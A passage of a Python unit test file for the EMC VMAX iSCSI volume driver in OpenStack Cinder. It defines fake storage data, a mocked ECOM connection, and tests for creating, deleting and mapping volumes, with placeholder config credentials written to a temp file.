'"SYMMETRIX+000198700440+OS_default_GOLD1_SG"')
storage_system = 'SYMMETRIX+000195900551'
lunmaskctrl_id =\
'SYMMETRIX+000195900551+OS-fakehost-gold-MV'
lunmaskctrl_name =\
'OS-fakehost-gold-MV'
initiatorgroup_id =\
'SYMMETRIX+000195900551+OS-fakehost-IG'
initiatorgroup_name =\
'OS-fakehost-IG'
initiatorgroup_creationclass = 'SE_InitiatorMaskingGroup'
storageextent_creationclass = 'CIM_StorageExtent'
initiator1 = 'iqn.1993-08.org.debian: 01: 1a2b3c4d5f6g'
stconf_service_creationclass = 'Symm_StorageConfigurationService'
ctrlconf_service_creationclass = 'Symm_ControllerConfigurationService'
elementcomp_service_creationclass = 'Symm_ElementCompositionService'
storreloc_service_creationclass = 'Symm_StorageRelocationService'
replication_service_creationclass = 'EMC_ReplicationService'
vol_creationclass = 'Symm_StorageVolume'
pool_creationclass = 'Symm_VirtualProvisioningPool'
lunmask_creationclass = 'Symm_LunMaskingSCSIProtocolController'
lunmask_creationclass2 = 'Symm_LunMaskingView'
hostedservice_creationclass = 'CIM_HostedService'
policycapability_creationclass = 'CIM_TierPolicyServiceCapabilities'
policyrule_creationclass = 'Symm_TierPolicyRule'
assoctierpolicy_creationclass = 'CIM_StorageTier'
storagepool_creationclass = 'Symm_VirtualProvisioningPool'
storagegroup_creationclass = 'CIM_DeviceMaskingGroup'
hardwareid_creationclass = 'SE_StorageHardwareID'
storagepoolid = 'SYMMETRIX+000195900551+U+gold'
storagegroupname = 'OS_default_GOLD1_SG'
storagevolume_creationclass = 'EMC_StorageVolume'
policyrule = 'gold'
poolname = 'gold'
unit_creationclass = 'CIM_ProtocolControllerForUnit'
storage_type = 'gold'
keybindings = {'CreationClassName': u'Symm_StorageVolume',
'SystemName': u'SYMMETRIX+000195900551',
'DeviceID': u'1',
'SystemCreationClassName': u'Symm_StorageSystem'}
keybindings2 = {'CreationClassName': u'Symm_StorageVolume',
'SystemName': u'SYMMETRIX+000195900551',
'DeviceID': u'99999',
'SystemCreationClassName': u'Symm_StorageSystem'}
provider_location = {'classname': 'Symm_StorageVolume',
'keybindings': keybindings}
provider_location2 = {'classname': 'Symm_StorageVolume',
'keybindings': keybindings2}
properties = {'ConsumableBlocks': '12345',
'BlockSize': '512'}
test_volume = {'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': 'abc',
'provider_location': str(provider_location),
'status': 'available',
'host': 'fake-host'
}
test_failed_volume = {'name': 'failed_vol',
'size': 1,
'volume_name': 'failed_vol',
'id': '4',
'provider_auth': None,
'project_id': 'project',
'display_name': 'failed_vol',
'display_description': 'test failed volume',
'volume_type_id': 'abc'}
failed_delete_vol = {'name': 'failed_delete_vol',
'size': '-1',
'volume_name': 'failed_delete_vol',
'id': '99999',
'provider_auth': None,
'project_id': 'project',
'display_name': 'failed delete vol',
'display_description': 'failed delete volume',
'volume_type_id': 'abc',
'provider_location': str(provider_location2)}
test_source_volume = {'size': 1,
'volume_type_id': 'sourceid',
'display_name': 'sourceVolume',
'name': 'sourceVolume',
'volume_name': 'vmax-154326',
'provider_auth': None,
'project_id':
'project', 'id': '2',
'provider_location': str(provider_location),
'display_description': 'snapshot source volume'}
location_info = {'location_info': '000195900551#silver#None',
'storage_protocol': 'ISCSI'}
test_host = {'capabilities': location_info,
'host': 'fake_host'}
test_ctxt = {}
new_type = {}
diff = {}
class FakeEcomConnection():
def __init__(self, *args, **kwargs):
self.data = EMCVMAXCommonData()
def InvokeMethod(self, MethodName, Service, ElementName=None, InPool=None,
ElementType=None, Size=None,
SyncType=None, SourceElement=None,
Operation=None, Synchronization=None,
TheElements=None, TheElement=None,
LUNames=None, InitiatorPortIDs=None, DeviceAccesses=None,
ProtocolControllers=None,
MaskingGroup=None, Members=None,
HardwareId=None, ElementSource=None, EMCInPools=None,
CompositeType=None, EMCNumberOfMembers=None,
EMCBindElements=None,
InElements=None, TargetPool=None, RequestedState=None):
rc = 0L
myjob = SE_ConcreteJob()
myjob.classname = 'SE_ConcreteJob'
myjob['InstanceID'] = '9999'
myjob['status'] = 'success'
myjob['type'] = ElementName
if Size == -1073741824 and \
MethodName == 'CreateOrModifyCompositeElement':
rc = 0L
myjob = SE_ConcreteJob()
myjob.classname = 'SE_ConcreteJob'
myjob['InstanceID'] = '99999'
myjob['status'] = 'success'
myjob['type'] = 'failed_delete_vol'
elif ElementName is None and \
MethodName == 'CreateOrModifyCompositeElement':
rc = 0L
myjob = SE_ConcreteJob()
myjob.classname = 'SE_ConcreteJob'
myjob['InstanceID'] = '9999'
myjob['status'] = 'success'
myjob['type'] = 'vol1'
if ElementName == 'failed_vol' and \
MethodName == 'CreateOrModifyElementFromStoragePool':
rc = 10L
myjob['status'] = 'failure'
elif TheElements and \
TheElements[0]['DeviceID'] == '99999' and \
MethodName == 'EMCReturnToStoragePool':
rc = 10L
myjob['status'] = 'failure'
elif HardwareId:
rc = 0L
targetendpoints = {}
endpoints = []
endpoint = {}
endpoint['Name'] = '1234567890123'
endpoints.append(endpoint)
endpoint2 = {}
endpoint2['Name'] = '0987654321321'
endpoints.append(endpoint2)
targetendpoints['TargetEndpoints'] = endpoints
return rc, targetendpoints
job = {'Job': myjob}
return rc, job
def EnumerateInstanceNames(self, name):
result = None
if name == 'EMC_StorageConfigurationService':
result = self._enum_stconfsvcs()
elif name == 'EMC_ControllerConfigurationService':
result = self._enum_ctrlconfsvcs()
elif name == 'Symm_ElementCompositionService':
result = self._enum_elemcompsvcs()
elif name == 'Symm_StorageRelocationService':
result = self._enum_storrelocsvcs()
elif name == 'EMC_ReplicationService':
result = self._enum_replicsvcs()
elif name == 'EMC_VirtualProvisioningPool':
result = self._enum_pools()
elif name == 'EMC_StorageVolume':
result = self._enum_storagevolumes()
elif name == 'Symm_StorageVolume':
result = self._enum_storagevolumes()
elif name == 'CIM_ProtocolControllerForUnit':
result = self._enum_unitnames()
elif name == 'EMC_LunMaskingSCSIProtocolController':
result = self._enum_lunmaskctrls()
elif name == 'EMC_StorageProcessorSystem':
result = self._enum_processors()
elif name == 'EMC_StorageHardwareIDManagementService':
result = self._enum_hdwidmgmts()
elif name == 'SE_StorageHardwareID':
result = self._enum_storhdwids()
else:
result = self._default_enum()
return result
def EnumerateInstances(self, name):
result = None
if name == 'EMC_VirtualProvisioningPool':
result = self._enum_pool_details()
elif name == 'SE_StorageHardwareID':
result = self._enum_storhdwids()
else:
result = self._default_enum()
return result
def GetInstance(self, objectpath, LocalOnly=False):
try:
name = objectpath['CreationClassName']
except KeyError:
name = objectpath.classname
result = None
if name == 'Symm_StorageVolume':
result = self._getinstance_storagevolume(objectpath)
elif name == 'CIM_ProtocolControllerForUnit':
result = self._getinstance_unit(objectpath)
elif name == 'SE_ConcreteJob':
result = self._getinstance_job(objectpath)
elif name == 'SE_StorageSynchronized_SV_SV':
result = self._getinstance_syncsvsv(objectpath)
elif name == 'Symm_TierPolicyServiceCapabilities':
result = self._getinstance_policycapabilities(objectpath)
elif name == 'CIM_TierPolicyServiceCapabilities':
result = self._getinstance_policycapabilities(objectpath)
elif name == 'SE_InitiatorMaskingGroup':
result = self._getinstance_initiatormaskinggroup(objectpath)
elif name == 'SE_StorageHardwareID':
result = self._getinstance_storagehardwareid(objectpath)
else:
result = self._default_getinstance(objectpath)
return result
def DeleteInstance(self, objectpath):
pass
def Associators(self, objectpath, ResultClass='EMC_StorageHardwareID'):
result = None
if ResultClass == 'EMC_StorageHardwareID':
result = self._assoc_hdwid()
elif ResultClass == 'EMC_iSCSIProtocolEndpoint':
result = self._assoc_endpoint()
elif ResultClass == 'EMC_StorageVolume':
result = self._assoc_storagevolume(objectpath)
else:
result = self._default_assoc(objectpath)
return result
def AssociatorNames(self, objectpath,
ResultClass='default', AssocClass='default'):
result = None
if ResultClass == 'EMC_LunMaskingSCSIProtocolController':
result = self._assocnames_lunmaskctrl()
elif AssocClass == 'CIM_HostedService':
result = self._assocnames_hostedservice()
elif ResultClass == 'CIM_TierPolicyServiceCapabilities':
result = self._assocnames_policyCapabilities()
elif ResultClass == 'Symm_TierPolicyRule':
result = self._assocnames_policyrule()
elif AssocClass == 'CIM_AssociatedTierPolicy':
result = self._assocnames_assoctierpolicy()
elif ResultClass == 'CIM_StoragePool':
result = self._assocnames_storagepool()
elif ResultClass == 'EMC_VirtualProvisioningPool':
result = self._assocnames_storagepool()
elif ResultClass == 'CIM_DeviceMaskingGroup':
result = self._assocnames_storagegroup()
elif ResultClass == 'EMC_StorageVolume':
result = self._enum_storagevolumes()
elif ResultClass == 'Symm_StorageVolume':
result = self._enum_storagevolumes()
elif ResultClass == 'SE_InitiatorMaskingGroup':
result = self._enum_initiatorMaskingGroup()
elif ResultClass == 'CIM_StorageExtent':
result = self._enum_storage_extent()
elif ResultClass == 'SE_StorageHardwareID':
result = self._enum_storhdwids()
else:
result = self._default_assocnames(objectpath)
return result
def ReferenceNames(self, objectpath,
ResultClass='CIM_ProtocolControllerForUnit'):
result = None
if ResultClass == 'CIM_ProtocolControllerForUnit':
result = self._ref_unitnames2()
else:
result = self._default_ref(objectpath)
return result
def _ref_unitnames(self):
unitnames = []
unitname = {}
dependent = {}
dependent['CreationClassName'] = self.data.vol_creationclass
dependent['DeviceID'] = self.data.test_volume['id']
dependent['ElementName'] = self.data.test_volume['name']
dependent['SystemName'] = self.data.storage_system
antecedent = {}
antecedent['CreationClassName'] = self.data.lunmask_creationclass
antecedent['DeviceID'] = self.data.lunmaskctrl_id
antecedent['SystemName'] = self.data.storage_system
unitname['Dependent'] = dependent
unitname['Antecedent'] = antecedent
unitname['CreationClassName'] = self.data.unit_creationclass
unitnames.append(unitname)
return unitnames
def _ref_unitnames2(self):
unitnames = []
unitname = {}
dependent = {}
dependent['CreationClassName'] = self.data.vol_creationclass
dependent['DeviceID'] = self.data.test_volume['id']
dependent['ElementName'] = self.data.test_volume['name']
dependent['SystemName'] = self.data.storage_system
antecedent = {}
antecedent['CreationClassName'] = self.data.lunmask_creationclass2
antecedent['SystemName'] = self.data.storage_system
unitname['Dependent'] = dependent
unitname['Antecedent'] = antecedent
unitname['CreationClassName'] = self.data.unit_creationclass
unitnames.append(unitname)
return unitnames
def _default_ref(self, objectpath):
return objectpath
def _assoc_hdwid(self):
assocs = []
assoc = {}
assoc['StorageID'] = self.data.connector['initiator']
assocs.append(assoc)
for wwpn in self.data.connector['wwpns']:
assoc2 = {}
assoc2['StorageID'] = wwpn
assocs.append(assoc2)
return assocs
def _assoc_endpoint(self):
assocs = []
assoc = {}
assoc['Name'] = 'iqn.1992-04.com.emc: 50000973f006dd80'
assoc['SystemName'] = self.data.storage_system
assocs.append(assoc)
return assocs
# Added test for EMC_StorageVolume associators
def _assoc_storagevolume(self, objectpath):
assocs = []
if 'type' not in objectpath:
vol = self.data.test_volume
elif objectpath['type'] == 'failed_delete_vol':
vol = self.data.failed_delete_vol
elif objectpath['type'] == 'vol1':
vol = self.data.test_volume
elif objectpath['type'] == 'appendVolume':
vol = self.data.test_volume
elif objectpath['type'] == 'failed_vol':
vol = self.data.test_failed_volume
else:
return None
vol['DeviceID'] = vol['id']
assoc = self._getinstance_storagevolume(vol)
assocs.append(assoc)
return assocs
def _default_assoc(self, objectpath):
return objectpath
def _assocnames_lunmaskctrl(self):
return self._enum_lunmaskctrls()
def _assocnames_hostedservice(self):
return self._enum_hostedservice()
def _assocnames_policyCapabilities(self):
return self._enum_policycapabilities()
def _assocnames_policyrule(self):
return self._enum_policyrules()
def _assocnames_assoctierpolicy(self):
return self._enum_assoctierpolicy()
def _assocnames_storagepool(self):
return self._enum_storagepool()
def _assocnames_storagegroup(self):
return self._enum_storagegroup()
def _assocnames_storagevolume(self):
return self._enum_storagevolume()
def _default_assocnames(self, objectpath):
return objectpath
def _getinstance_storagevolume(self, objectpath):
foundinstance = None
instance = EMC_StorageVolume()
vols = self._enum_storagevolumes()
for vol in vols:
if vol['DeviceID'] == objectpath['DeviceID']:
instance = vol
break
if not instance:
foundinstance = None
else:
foundinstance = instance
return foundinstance
def _getinstance_lunmask(self):
lunmask = {}
lunmask['CreationClassName'] = self.data.lunmask_creationclass
lunmask['DeviceID'] = self.data.lunmaskctrl_id
lunmask['SystemName'] = self.data.storage_system
return lunmask
def _getinstance_initiatormaskinggroup(self, objectpath):
initiatorgroup = SE_InitiatorMaskingGroup()
initiatorgroup['CreationClassName'] = (
self.data.initiatorgroup_creationclass)
initiatorgroup['DeviceID'] = self.data.initiatorgroup_id
initiatorgroup['SystemName'] = self.data.storage_system
initiatorgroup.path = initiatorgroup
return initiatorgroup
def _getinstance_storagehardwareid(self, objectpath):
hardwareid = SE_StorageHardwareID()
hardwareid['CreationClassName'] = self.data.hardwareid_creationclass
hardwareid['SystemName'] = self.data.storage_system
hardwareid['StorageID'] = self.data.connector['wwpns'][0]
hardwareid.path = hardwareid
return hardwareid
def _getinstance_unit(self, objectpath):
unit = {}
dependent = {}
dependent['CreationClassName'] = self.data.vol_creationclass
dependent['DeviceID'] = self.data.test_volume['id']
dependent['ElementName'] = self.data.test_volume['name']
dependent['SystemName'] = self.data.storage_system
antecedent = {}
antecedent['CreationClassName'] = self.data.lunmask_creationclass
antecedent['DeviceID'] = self.data.lunmaskctrl_id
antecedent['SystemName'] = self.data.storage_system
unit['Dependent'] = dependent
unit['Antecedent'] = antecedent
unit['CreationClassName'] = self.data.unit_creationclass
unit['DeviceNumber'] = '1'
return unit
def _getinstance_job(self, jobpath):
jobinstance = {}
jobinstance['InstanceID'] = '9999'
if jobpath['status'] == 'failure':
jobinstance['JobState'] = 10
jobinstance['ErrorCode'] = 99
jobinstance['ErrorDescription'] = 'Failure'
else:
jobinstance['JobState'] = 7
jobinstance['ErrorCode'] = 0
jobinstance['ErrorDescription'] = ''
return jobinstance
def _getinstance_policycapabilities(self, policycapabilitypath):
instance = Fake_CIM_TierPolicyServiceCapabilities()
fakeinstance = instance.fake_getpolicyinstance()
return fakeinstance
def _default_getinstance(self, objectpath):
return objectpath
def _enum_stconfsvcs(self):
conf_services = []
conf_service = {}
conf_service['SystemName'] = self.data.storage_system
conf_service['CreationClassName'] =\
self.data.stconf_service_creationclass
conf_services.append(conf_service)
return conf_services
def _enum_ctrlconfsvcs(self):
conf_services = []
conf_service = {}
conf_service['SystemName'] = self.data.storage_system
conf_service['CreationClassName'] =\
self.data.ctrlconf_service_creationclass
conf_services.append(conf_service)
return conf_services
def _enum_elemcompsvcs(self):
comp_services = []
comp_service = {}
comp_service['SystemName'] = self.data.storage_system
comp_service['CreationClassName'] =\
self.data.elementcomp_service_creationclass
comp_services.append(comp_service)
return comp_services
def _enum_storrelocsvcs(self):
reloc_services = []
reloc_service = {}
reloc_service['SystemName'] = self.data.storage_system
reloc_service['CreationClassName'] =\
self.data.storreloc_service_creationclass
reloc_services.append(reloc_service)
return reloc_services
def _enum_replicsvcs(self):
replic_services = []
replic_service = {}
replic_service['SystemName'] = self.data.storage_system
replic_service['CreationClassName'] =\
self.data.replication_service_creationclass
replic_services.append(replic_service)
return replic_services
def _enum_pools(self):
pools = []
pool = {}
pool['InstanceID'] = self.data.storage_system + '+U+' +\
self.data.storage_type
pool['CreationClassName'] = 'Symm_VirtualProvisioningPool'
pool['ElementName'] = 'gold'
pools.append(pool)
return pools
def _enum_pool_details(self):
pools = []
pool = {}
pool['InstanceID'] = self.data.storage_system + '+U+' +\
self.data.storage_type
pool['CreationClassName'] = 'Symm_VirtualProvisioningPool'
pool['TotalManagedSpace'] = 12345678
pool['RemainingManagedSpace'] = 123456
pools.append(pool)
return pools
def _enum_storagevolumes(self):
vols = []
vol = EMC_StorageVolume()
vol['name'] = self.data.test_volume['name']
vol['CreationClassName'] = 'Symm_StorageVolume'
vol['ElementName'] = self.data.test_volume['name']
vol['DeviceID'] = self.data.test_volume['id']
vol['SystemName'] = self.data.storage_system
# Added vol to vol.path
vol['SystemCreationClassName'] = 'Symm_StorageSystem'
vol.path = vol
vol.path.classname = vol['CreationClassName']
classcimproperty = Fake_CIMProperty()
blocksizecimproperty = classcimproperty.fake_getBlockSizeCIMProperty()
consumableBlockscimproperty = (
classcimproperty.fake_getConsumableBlocksCIMProperty())
isCompositecimproperty = (
classcimproperty.fake_getIsCompositeCIMProperty())
properties = {u'ConsumableBlocks': blocksizecimproperty,
u'BlockSize': consumableBlockscimproperty,
u'IsComposite': isCompositecimproperty}
vol.properties = properties
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = 'Symm_StorageVolume'
keys['SystemName'] = self.data.storage_system
keys['DeviceID'] = vol['DeviceID']
keys['SystemCreationClassName'] = 'Symm_StorageSystem'
name['keybindings'] = keys
vol['provider_location'] = str(name)
vols.append(vol)
failed_delete_vol = EMC_StorageVolume()
failed_delete_vol['name'] = 'failed_delete_vol'
failed_delete_vol['CreationClassName'] = 'Symm_StorageVolume'
failed_delete_vol['ElementName'] = 'failed_delete_vol'
failed_delete_vol['DeviceID'] = '99999'
failed_delete_vol['SystemName'] = self.data.storage_system
# Added vol to vol.path
failed_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
failed_delete_vol.path = failed_delete_vol
failed_delete_vol.path.classname =\
failed_delete_vol['CreationClassName']
vols.append(failed_delete_vol)
failed_vol = EMC_StorageVolume()
failed_vol['name'] = 'failed__vol'
failed_vol['CreationClassName'] = 'Symm_StorageVolume'
failed_vol['ElementName'] = 'failed_vol'
failed_vol['DeviceID'] = '4'
failed_vol['SystemName'] = self.data.storage_system
# Added vol to vol.path
failed_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
failed_vol.path = failed_vol
failed_vol.path.classname =\
failed_vol['CreationClassName']
name_failed = {}
name_failed['classname'] = 'Symm_StorageVolume'
keys_failed = {}
keys_failed['CreationClassName'] = 'Symm_StorageVolume'
keys_failed['SystemName'] = self.data.storage_system
keys_failed['DeviceID'] = failed_vol['DeviceID']
keys_failed['SystemCreationClassName'] = 'Symm_StorageSystem'
name_failed['keybindings'] = keys_failed
failed_vol['provider_location'] = str(name_failed)
vols.append(failed_vol)
return vols
def _enum_initiatorMaskingGroup(self):
initatorgroups = []
initatorgroup = {}
initatorgroup['CreationClassName'] = (
self.data.initiatorgroup_creationclass)
initatorgroup['DeviceID'] = self.data.initiatorgroup_id
initatorgroup['SystemName'] = self.data.storage_system
initatorgroup['ElementName'] = self.data.initiatorgroup_name
# initatorgroup.path = initatorgroup
# initatorgroup.path.classname = initatorgroup['CreationClassName']
initatorgroups.append(initatorgroup)
return initatorgroups
def _enum_storage_extent(self):
storageExtents = []
storageExtent = CIM_StorageExtent()
storageExtent['CreationClassName'] = (
self.data.storageextent_creationclass)
classcimproperty = Fake_CIMProperty()
isConcatenatedcimproperty = (
classcimproperty.fake_getIsConcatenatedCIMProperty())
properties = {u'IsConcatenated': isConcatenatedcimproperty}
storageExtent.properties = properties
storageExtents.append(storageExtent)
return storageExtents
def _enum_lunmaskctrls(self):
ctrls = []
ctrl = {}
ctrl['CreationClassName'] = self.data.lunmask_creationclass
ctrl['DeviceID'] = self.data.lunmaskctrl_id
ctrl['SystemName'] = self.data.storage_system
ctrl['ElementName'] = self.data.lunmaskctrl_name
ctrls.append(ctrl)
return ctrls
def _enum_hostedservice(self):
hostedservices = []
hostedservice = {}
hostedservice['CreationClassName'] = (
self.data.hostedservice_creationclass)
hostedservice['SystemName'] = self.data.storage_system
hostedservices.append(hostedservice)
return hostedservices
def _enum_policycapabilities(self):
policycapabilities = []
policycapability = {}
policycapability['CreationClassName'] = (
self.data.policycapability_creationclass)
policycapability['SystemName'] = self.data.storage_system
propertiesList = []
CIMProperty = {'is_array': True}
properties = {u'SupportedTierFeatures': CIMProperty}
propertiesList.append(properties)
policycapability['Properties'] = propertiesList
policycapabilities.append(policycapability)
return policycapabilities
def _enum_policyrules(self):
policyrules = []
policyrule = {}
policyrule['CreationClassName'] = self.data.policyrule_creationclass
policyrule['SystemName'] = self.data.storage_system
policyrule['PolicyRuleName'] = self.data.policyrule
policyrules.append(policyrule)
return policyrules
def _enum_assoctierpolicy(self):
assoctierpolicies = []
assoctierpolicy = {}
assoctierpolicy['CreationClassName'] = (
self.data.assoctierpolicy_creationclass)
assoctierpolicies.append(assoctierpolicy)
return assoctierpolicies
def _enum_storagepool(self):
storagepools = []
storagepool = {}
storagepool['CreationClassName'] = self.data.storagepool_creationclass
storagepool['InstanceID'] = self.data.storagepoolid
storagepool['ElementName'] = 'gold'
storagepools.append(storagepool)
return storagepools
def _enum_storagegroup(self):
storagegroups = []
storagegroup = {}
storagegroup['CreationClassName'] = (
self.data.storagegroup_creationclass)
storagegroup['ElementName'] = self.data.storagegroupname
storagegroups.append(storagegroup)
return storagegroups
def _enum_storagevolume(self):
storagevolumes = []
storagevolume = {}
storagevolume['CreationClassName'] = (
self.data.storagevolume_creationclass)
storagevolumes.append(storagevolume)
return storagevolumes
def _enum_hdwidmgmts(self):
services = []
srv = {}
srv['SystemName'] = self.data.storage_system
services.append(srv)
return services
def _enum_storhdwids(self):
storhdwids = []
hdwid = SE_StorageHardwareID()
hdwid['CreationClassName'] = self.data.hardwareid_creationclass
hdwid['StorageID'] = self.data.connector['wwpns'][0]
hdwid.path = hdwid
storhdwids.append(hdwid)
return storhdwids
def _default_enum(self):
names = []
name = {}
name['Name'] = 'default'
names.append(name)
return names
class EMCVMAXISCSIDriverNoFastTestCase(test.TestCase):
def setUp(self):
self.data = EMCVMAXCommonData()
self.tempdir = tempfile.mkdtemp()
super(EMCVMAXISCSIDriverNoFastTestCase, self).setUp()
self.config_file_path = None
self.config_file_1364232 = None
self.create_fake_config_file_no_fast()
self.addCleanup(self._cleanup)
configuration = mock.Mock()
configuration.safe_get.return_value = 'ISCSINoFAST'
configuration.cinder_emc_config_file = self.config_file_path
configuration.config_group = 'ISCSINoFAST'
self.stubs.Set(EMCVMAXISCSIDriver, 'smis_do_iscsi_discovery',
self.fake_do_iscsi_discovery)
self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
self.fake_ecom_connection)
instancename = FakeCIMInstanceName()
self.stubs.Set(EMCVMAXUtils, 'get_instance_name',
instancename.fake_getinstancename)
self.stubs.Set(time, 'sleep',
self.fake_sleep)
driver = EMCVMAXISCSIDriver(configuration=configuration)
driver.db = FakeDB()
self.driver = driver
self.driver.utils = EMCVMAXUtils(object)
def create_fake_config_file_no_fast(self):
doc = Document()
emc = doc.createElement("EMC")
doc.appendChild(emc)
array = doc.createElement("Array")
arraytext = doc.createTextNode("1234567891011")
emc.appendChild(array)
array.appendChild(arraytext)
ecomserverip = doc.createElement("EcomServerIp")
ecomserveriptext = doc.createTextNode("1.1.1.1")
emc.appendChild(ecomserverip)
ecomserverip.appendChild(ecomserveriptext)
ecomserverport = doc.createElement("EcomServerPort")
ecomserverporttext = doc.createTextNode("10")
emc.appendChild(ecomserverport)
ecomserverport.appendChild(ecomserverporttext)
ecomusername = doc.createElement("EcomUserName")
ecomusernametext = doc.createTextNode("user")
emc.appendChild(ecomusername)
ecomusername.appendChild(ecomusernametext)
ecompassword = doc.createElement("EcomPassword")
ecompasswordtext = doc.createTextNode("pass")
emc.appendChild(ecompassword)
ecompassword.appendChild(ecompasswordtext)
portgroup = doc.createElement("PortGroup")
portgrouptext = doc.createTextNode("myPortGroup")
portgroup.appendChild(portgrouptext)
portgroups = doc.createElement("PortGroups")
portgroups.appendChild(portgroup)
emc.appendChild(portgroups)
pool = doc.createElement("Pool")
pooltext = doc.createTextNode("gold")
emc.appendChild(pool)
pool.appendChild(pooltext)
array = doc.createElement("Array")
arraytext = doc.createTextNode("0123456789")
emc.appendChild(array)
array.appendChild(arraytext)
timeout = doc.createElement("Timeout")
timeouttext = doc.createTextNode("0")
emc.appendChild(timeout)
timeout.appendChild(timeouttext)
filename = 'cinder_emc_config_ISCSINoFAST.xml'
self.config_file_path = self.tempdir + '/' + filename
f = open(self.config_file_path, 'w')
doc.writexml(f)
f.close()
# Create XML config file with newlines and whitespaces
# Bug #1364232
def create_fake_config_file_1364232(self):
filename = 'cinder_emc_config_1364232.xml'
self.config_file_1364232 = self.tempdir + '/' + filename
text_file = open(self.config_file_1364232, "w")
text_file.write("<?xml version='1.0' encoding='UTF-8'?>\n<EMC>\n"
"<EcomServerIp>10.108.246.202</EcomServerIp>\n"
"<EcomServerPort>5988</EcomServerPort>\n"
"<EcomUserName>admin\t</EcomUserName>\n"
"<EcomPassword>#1Password</EcomPassword>\n"
"<PortGroups><PortGroup>OS-PORTGROUP1-PG"
"</PortGroup><PortGroup>OS-PORTGROUP2-PG"
" </PortGroup>\n"
"<PortGroup>OS-PORTGROUP3-PG</PortGroup>"
"<PortGroup>OS-PORTGROUP4-PG</PortGroup>"
"</PortGroups>\n<Array>000198700439"
" \n</Array>\n<Pool>FC_SLVR1\n"
"</Pool>\n<FastPolicy>SILVER1</FastPolicy>\n"
"</EMC>")
text_file.close()
def fake_ecom_connection(self):
conn = FakeEcomConnection()
return conn
def fake_do_iscsi_discovery(self, volume):
output = []
item = '10.10.0.50: 3260,1 iqn.1992-04.com.emc: 50000973f006dd80'
output.append(item)
return output
def fake_sleep(self, seconds):
return
def test_get_volume_stats_1364232(self):
self.create_fake_config_file_1364232()
self.assertEqual('000198700439',
self.driver.utils.parse_array_name_from_file(
self.config_file_1364232))
self.assertEqual('FC_SLVR1',
self.driver.utils.parse_pool_name_from_file(
self.config_file_1364232))
self.assertEqual('SILVER1',
self.driver.utils.parse_fast_policy_name_from_file(
self.config_file_1364232))
self.assertIn('OS-PORTGROUP',
self.driver.utils.parse_file_to_get_port_group_name(
self.config_file_1364232))
bExists = os.path.exists(self.config_file_1364232)
if bExists:
os.remove(self.config_file_1364232)
@mock.patch.object(
EMCVMAXCommon,
'_find_storageSystem',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'is_tiering_policy_enabled',
return_value=False)
@mock.patch.object(
EMCVMAXUtils,
'get_pool_capacities',
return_value=(1234, 1200))
@mock.patch.object(
EMCVMAXUtils,
'parse_array_name_from_file',
return_value="123456789")
def test_get_volume_stats_no_fast(self, mock_storage_system,
mock_is_fast_enabled,
mock_capacity, mock_array):
self.driver.get_volume_stats(True)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_create_volume_no_fast_success(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: stripedmetacount': '4',
'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_create_volume_no_fast_striped_success(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_delete_volume_no_fast_success(
self, _mock_volume_type, mock_storage_system):
self.driver.delete_volume(self.data.test_volume)
def test_create_volume_no_fast_failed(self):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
self.data.test_failed_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
def test_delete_volume_no_fast_notfound(self, _mock_volume_type):
notfound_delete_vol = {}
notfound_delete_vol['name'] = 'notfound_delete_vol'
notfound_delete_vol['id'] = '10'
notfound_delete_vol['CreationClassName'] = 'Symmm_StorageVolume'
notfound_delete_vol['SystemName'] = self.data.storage_system
notfound_delete_vol['DeviceID'] = notfound_delete_vol['id']
notfound_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
notfound_delete_vol['volume_type_id'] = 'abc'
notfound_delete_vol['provider_location'] = None
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = notfound_delete_vol['CreationClassName']
keys['SystemName'] = notfound_delete_vol['SystemName']
keys['DeviceID'] = notfound_delete_vol['DeviceID']
keys['SystemCreationClassName'] =\
notfound_delete_vol['SystemCreationClassName']
name['keybindings'] = keys
self.driver.delete_volume(notfound_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_delete_volume_failed(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.failed_delete_vol)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.data.failed_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'hostlunid': 1,
'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_no_fast_success(self, _mock_volume_type, mock_wrap_group,
mock_wrap_device):
self.driver.initialize_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'storagesystem': EMCVMAXCommonData.storage_system})
